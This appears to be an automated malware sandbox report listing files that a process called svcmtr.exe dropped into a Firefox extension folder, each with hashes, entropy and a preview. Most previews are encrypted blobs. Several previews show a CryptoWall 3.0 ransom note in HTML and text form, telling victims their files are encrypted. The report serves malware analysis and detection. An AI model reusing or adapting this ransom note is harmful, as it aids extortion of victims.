                                                                                                                          SSDEEP:96:cztoDFSagknmNrVK23jMIvzXaYJhkx8tuR60YeKjFSV2u/1E47Pn8eqz3Ia6N3P:GoZtmNrE23jLvnbjt0YeKj0VO4r8/UP
                                                                                                                          MD5:17C2FE3D4DB92B74C7357C37DF75F751
                                                                                                                          SHA1:29575A8A49ED58124FFF938A00364E361ECF1032
                                                                                                                          SHA-256:48B20B65D6F275EBD217A948BE33824BA24F5796B2D25A59A2485F140BB30DE3
                                                                                                                          SHA-512:7869041F7566E143EF04451CA1957B410615704F712CED8A6A7ECEE24F1F567722CCAF5A4CF47AC7C4379A1F9FA06AF7395412AC13F64E8F96F13ABFCF1C0DB5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......-.Z..j.ui6.....v..._.T..c....B...I...WXWy.V|ZJ.....b..mb%...x..!r.7.+*.F...................wN..?$..{s]F-)ET.(..F..n...v.o..r. ..P\.*..v.':.$..E[y.D...{o...}..'.h`......d.A.w.=p.=2;..gH]....Sz........u......X."...>K.80.q...{.X....=....S.:Q....m.;....`=0e.5ca..\R.9?1UW..../...Z75,.....M.....t....b<...{...E.H...D...)..<.v...t........(g...M..k......_Pw.....t..3.h...-...!!.m...e...._m.<....._..AU29..@....Dp7..E.:`..f}....,hK.......n.......S5l..,.utg...h1...6..G.e...@.{.....$../B...u=)!Ui..(I$...,!^.ly.....*..}H.-)q..u..Q^mqW.d%.WW.....lo.d.....q..)'.#..-.}...Um!.H.t

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\about-home.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3358
                                                                                                                          Entropy (8bit):7.889410827723681
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDglaSYqo2lZbfkyhlfoUW+4HVIDj5PXgtOVM5NjCWDUGgyoFEwsPBlYOB:cztoD/qabE4+314eWwpytLXYMmx6
                                                                                                                          MD5:53F234C7D83A6716C5688AD4125CAC10
                                                                                                                          SHA1:2B53DC77E590D17DA70838B3A8568F7B28B371DD
                                                                                                                          SHA-256:985BCFDB2B27879F0A69C836246FF5059E7D10D990A874A0B4FE8F52C2FB0691
                                                                                                                          SHA-512:8D7661A9CF5C7F37B38594FB693901A5B8049F9E373EBB37ED40ADF184F0B4C54AA3976069EDB47E53476DED1B4B961A31F7B397515B42E36C81930E1853057D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....*...'........v.....$.-.d@.......u.D.w.W.....LL2:i....q-Zg...Qs.t....c^.;H.l.#._..<..b..-.c..<nb......V.=.X...M..........3G..V.......p@...y.Q......tA?..8{..j...wu..(..Y.....;.#Z..bH..H.s%+.V.......'..$S..%V.R.I..9.y..4..%.%..~.5.l*......d.].p.Jn....6..4*..z.;1l.?.3z!....'....Y3....f......0.....pu...(......tJv.\!0-O.xy.......z8..nkE3H.a8.u...,.p.M...c.~./...4.....v..x)}.*8IG.,...|.E.mX..-h..~.$...5.A.8X..~"D.R.z....}....|.,..A.....o.c.c.....Fi....f>...7>.i....<.....HA\...h...L.E.>-!..7.5../.S|(..z.%yC....>..X.{/...)J.....}~.X!...lH.1.8..L...v..L.LE.>.z.L.ye...%2.I%.M[.&e.....6..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\firstrun.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7950
                                                                                                                          Entropy (8bit):7.963624534895654
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoGMJO30MWyOAvgTTu7AIOAY9iqmDURUr6VF:GEOEzyXGy7I9PmDUCuVF
                                                                                                                          MD5:EF8861DA734425161C41CD212CFDBBC4
                                                                                                                          SHA1:C4C7CE8D9D3900470EF4CC4CA438ADACEFC860C6
                                                                                                                          SHA-256:1AF67539332BBFED337B89F97DFC6188D65680515E911ADD41CC7EAE23953035
                                                                                                                          SHA-512:C27E1835537B0DE0B8EC820108BEC58C271C914F536CE6A31E6DC0D0F944B4CB4FF1FE3C9872338B97EA7B0EF3465E9286BDA0064490D5EA651385D0B6DD7D91
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...)..n.......iD.wh...H#.2o-...`.>Dv...G.....nq2...b...Q...f....q....7...r2.c.iR..f..m..O..0l9.5+..9......OY.Jg..5.Lx.!.Ly.N.<.v....m%....L....7...4d}......Oi.....0.q.40w.c.k...!s7P2(D..u..)...P....@ydf...O..Z]..'.M.M.P..c....Y..k.Gs.>...:...l..)...j..j...,..pl.F..i..+d...6...x....8R...B..l.#...3...P.."..Vx..F.D.....?.T..))..I/..&2.-.z..W,...2..+(.n.....[...QXU..D........-......6~.....w.........z @.w...|).i..N#....(./>..Uo.i.T.,..j..U\+.7..IU.j..^....z..5...`b.........7A.v.).S2.I.G.8.!.y..&..../>..|2......h~..I....U.<..u...K*..}.|d.....Q...Y(q.!.!......-...[..v~./..v...-&.t...GvI.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\snippets.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1022
                                                                                                                          Entropy (8bit):7.407610323035598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2NRSSN4vNBY2znREGDsktrsfQvA1ypJXsL3:c+9U40oDgLzbREGIQeQCaJXsD
                                                                                                                          MD5:21EBE79E1EEB09CFDA3FE9C7D1D9CD0D
                                                                                                                          SHA1:92C4C4ED283624A3815B46C5DA3FB6BC77BFC910
                                                                                                                          SHA-256:D003672B2774B9BAE6CF650BE1B34F4A322B4AF130B09FC1C27BC783726F32E0
                                                                                                                          SHA-512:6091191A778793FD47BF2ECC29BAE9A13987DAB29A517F8F09C00E1E7CB0922917CA6B2CEFEBB23C3A458A234460C82ACA60EB830F58AC5DBCF657E86D8BCE27
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...(..g.:9us.0.k7S]...$..S..AS~n=.A..@E..... .!C.V..{..dP..;.,s...I.kS%.0>..?7..c.t...o~nh^...-..b=..RJ...s...}j..I42A.".C.4...m.....A7.[...l~.0.D.)O{...6...'......V.p#.."X.......Y......P.}P......>..jE..K.n..%F...,...&!*.?...;..k!....e....:..B...9q.....t............G......O-.wX@E.7..?.&..^..I...l.w.1..x.[..Y...lP..]'.2.i..J.F2......aL9/._..z.......^..\..l...h..q..j..e...P...c...KO.zv}Y.`u[..".&.H..&.9..?....7.s"....=...kF....\..X..6lT;...k......n..jg..t....U.~...hji...d!.|p...........X5.q......Lws.m....$.......}.*.l.U.a~.J..Z..G..Zo.'xrPF........Ed..%.3a..P.q......w..'..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\intervals.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1118
                                                                                                                          Entropy (8bit):7.4994433044768725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2CQ2iXBo+JlxaC9LJ1bts3twhPd:c+9U40oDgrYBTJlxFXh1
                                                                                                                          MD5:23B2577AA073F3178AC179CA71DCBBAE
                                                                                                                          SHA1:5CBBB513F3721F5180E274FDF220930CDA7D1F00
                                                                                                                          SHA-256:A8FA0FE61505C25A40EE9BF054E7AA320D9C405DE3EDFF2ACC13820D7C4EA97B
                                                                                                                          SHA-512:719EA18589485172B5C47EB66D5B0451E8D9C619CDA95E1AA4B09B08B3A82BE4C69BD930604A8AEE77BA8EE4205FDC16FE90E7A00E20884E0CAC87EE54363595
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..2.j.......7........?..E..."..D.6O....).k.K........b&.g...~.8=...^>F.....-_.......J...M~6E..\_.4.T..}......!....c>G....?z.:...-d..._.....1.V.i..0.t...d_..q.N......z...d.D.a...bN..tdJ?...K..(J`..&...^.......j...?.....G....*.:........n.,..=Z.W....}N....._.|.........Z.#x....k..y>.....=...t5..B}"z*P.......hA%%V..2.V...}..hOz..p:.4.../....p..P#....p.~......L.....oq.......Fbx......V...E..%[...J.B..p.I.N......}...Xr5...hB..a....)....v...Uc..M..l.....Nh.9(.{.i....Q.Y.ao/.I.J.d.....+....eT. l..Q..l....X.d"L.T[.....\n...c.$...~.R....|)T(.Z3... b..2:dv.O...C..Q......I.aN..Y...:

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\notification-manager.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2686
                                                                                                                          Entropy (8bit):7.841598417414712
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgkRSxWKzQVOIpAEOxGErobhNlhkGa0jFEYSSdPYcfCk:cztoDFEQVOIpLOxGECNXNC4hKk
                                                                                                                          MD5:6CDC1F936EE5A8D64933BC288E268558
                                                                                                                          SHA1:917EF76A1DD35967DE19229DF2EC617E112159D4
                                                                                                                          SHA-256:BE4FB97BCC6514231334D5B242A07B6587C68D663780151BBF66CA3C0A3366AB
                                                                                                                          SHA-512:58189D865F5F99D9700A3EBE0046D4B7A18831B9B84C0BF5B5DEE76245A63ED67CF24F58AD6F0EB9DF417D3185CF89285E75D85CE67B8AD94C6533FF94E5162E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..n.L).-..d......q....1..:g......-....:....$6Qk.C.$..........Z...8...~..n..E`q.j.vA.}+...1..C;v2._...%..Qf.g.. ..A44.a+@..p..x...<...D..1...u..J.x..|6.g....3..8..sVm:3.N...F....e.{..O.....1.......'k5.....W..?.....`.o..z./.0.'.......V..p.......Z.]......Z2......-...{....q.<...o|..w.l..n3.S..........C@B@.i....F..zEg...... R....v.....oa....~yw.[W..z-....cs.+.Y.u+..D$W.{..fV.*?I.R..od.....]E..>..!(.....9>h.'....q.T......v.x*......D.....*....~...0....#.|.......8^$....D.6.a...k5....{...3q.F,..).K.Q..;N.......N....F)\.<..... M..Mb...)$.......e.t6k.1J7u.)%x..`kq..%.W..o.....3.a

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\scheduler.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9614
                                                                                                                          Entropy (8bit):7.970616820994937
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GozxK7sNJaudsUnL0Kt+fdt8O/8INsWy1AjmHu27eYeKecv6M3iQsE:GIxK7uksshKEfQA8ki1AqLAhMyQB
                                                                                                                          MD5:F1CCC967A9ACAE79D40D5644EF8F3FB5
                                                                                                                          SHA1:666BD13464EC22D8A3B142C71C7A14962CE3B33F
                                                                                                                          SHA-256:CA7ABD4980F44616E8285889E58B731DA9A75A36E7EB0C73BE1CAB25AF612757
                                                                                                                          SHA-512:FF79D1C296D061222626731EDF841EE0E19A3BB4E50819894DC4BFCA72C24296935BE03ACD35EDF6EC91157743DA0FF40E0A05628625ED4012DDA0B6D1E94BEF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..M.S'Gdd.?.....G[.#..z.....#.K.|sa@..=....Ce.....s.....7..b......O..i...AdN...uI..#7.e.u..dd.;.P:K,H....g.(.@.n.j<....i..}#...t.KhT....c,.q.9..dO....W..G...@..t.8....*....).hJ....q..h.nI.a....i..S.^..'.l.v.~|;o3k.m.0.[.....W...p..."L.i...Y..h......!.O,....H7...D..O.9!Iy...^...f+.Y..]..O..N.N...,.....l...f...*.l.h.i..=5.....gw.[.-..c.R?.6.M....l...I.R....t.Ah..s]I..#.....P.....k.<..M.v_.Pd$R...*.2...Ol...8...\."P@.v.s....K.Yg........M.s..R?l9....;?qe.N...W.j.+..yF.D...uJ...._...{k..\...P>~2.~S...?}..`...8..tr....o....Ty'.I....B....e..4?..3....Z.CGqM~.......o....>d..L14W...

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\sidebar-events.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1294
                                                                                                                          Entropy (8bit):7.574045469388257
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2H/LYZo0LOOi+tMeBKMx10CbUfoh4xHWvHcaaGKEMG:c+9U40oDg48Zo6Qu1zUo4B0HcaLKe
                                                                                                                          MD5:BCD139CF463E642A5EB833BDAE3C16FC
                                                                                                                          SHA1:680FC6656B480FE846176760B1835ECE071B8A3D
                                                                                                                          SHA-256:1CC86DEEFB47B5FC17B40FCFBCE4B5B9FAA7E97C6BB172CA97002C8800D99D44
                                                                                                                          SHA-512:1F672C2AC5822978DAFE3A51AABA4E5C35BB25735C800FE445917C154346A0910916982CDA39E1FAAE8ADB5316E15B4FB3F44BBA15F44CAE8277B0C53285ED79
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..>....8...,#4<^f.i...c...}o..R...._P7A..F..j3...D..ET...mzC...S.).~.......6d-|.F..U.(.....Bu..H..y3....@kQa....9..OB...V0....q"E...y5-RvS.M...9.HsU....TD.v...Qv%.........@..z.G......o.m[.....;...#~.....aq....2mh..FLP...0B...u.......H..T...J.,........V..lp...<..X9.6.....e;.DV.,,.2.....#~..=8......V....DJH...m{...D...p.K'kR.g.H...~..*....Yr.{?_.D1...d90..N!w{.6.%=}...+....%.d.N.Q.:.a.".d....M*#..,<..K...~.......\.XF.9.. G.j.........{r.O....m#(......E.33..(......N......%..].z..L/.!`.?.?.f.cX.a*{n.t.....o,....?.D.b2....C.?C......F.nM.C.......1.O%.4`r...C.s..>...Sx/c..F.K'..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\sidebar-manager.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15262
                                                                                                                          Entropy (8bit):7.986557814034618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GxnevkPuEdz/XWY2Z/0zFz7XtPgpARc2pItUUxfZkJ5T:GWkGEpPWYiC5Pgeq0URRwT
                                                                                                                          MD5:05B83CB7388292C0AE9B7FD82365325F
                                                                                                                          SHA1:ACB59E69D90E0CB07E640CEA4BFFD7CDC447A379
                                                                                                                          SHA-256:57C99137A45A6A5FC05C8094FBFC39B1CB37038919D092421CDEBA1EE0C65B59
                                                                                                                          SHA-512:4B8E2E7DA595BB02DFD92C78D706F0E4AEFA329C5FD50EEDE1E1935E5E5CB7ED80DC32794511DE44E6839774CB34E9E7F9CAE09F17C216348CE32CACF469616F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264........(.+}v.jT.9..z... .\D.iG.u...Pq*...W<...!...:.-.W.........7..Nl.+I..'K....s..K.w..3.h.t.ds...)...;G|.).K...Zoh..C.{~....T......w-.+.(.....^...-.......O.J)..n`..dp..P<I...<z.f..sNqsp).....{....%XE.p`u....).j.g.,....yC..gE.+.Z...U.F.......6l...U.. "....b...........v./......../..d.-+../.qH.$...."..%.y[...],...C.8.....a...M.......9.d8Do.R.qj..by,..y.=..>.b..I9&6-3Q{.-=..fc=.....>o@=R~...r;.h.L..Ft.8.`L94H........C". [.7.t.^.^<}s`d.....$.k'.-}...GrS..JP.N.T|c..x.'..K}Yw.'.C...l.Z=..IlK}...Ix....X^DY............vA..zO2.Ni..Q.q...!..,.]..n{.Y.Z.7....CS....*..."..+.1..-..i.....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\sidebar-utils.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3774
                                                                                                                          Entropy (8bit):7.919865270631616
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDr2KKpXdPjJm+qcrrvjxyg7kYHDS63rNdogCmYEW:GovKpXJjJmpcXvMgPHtQ0W
                                                                                                                          MD5:CFBF54037B241242BA12F5133D729494
                                                                                                                          SHA1:0C54A179826DDE53AE16B2650F301D4CA1340A90
                                                                                                                          SHA-256:0D48742FA5E30D0A0C22865C3DB0E1A2D9BC7487BC768F15CCB03148B984BDC5
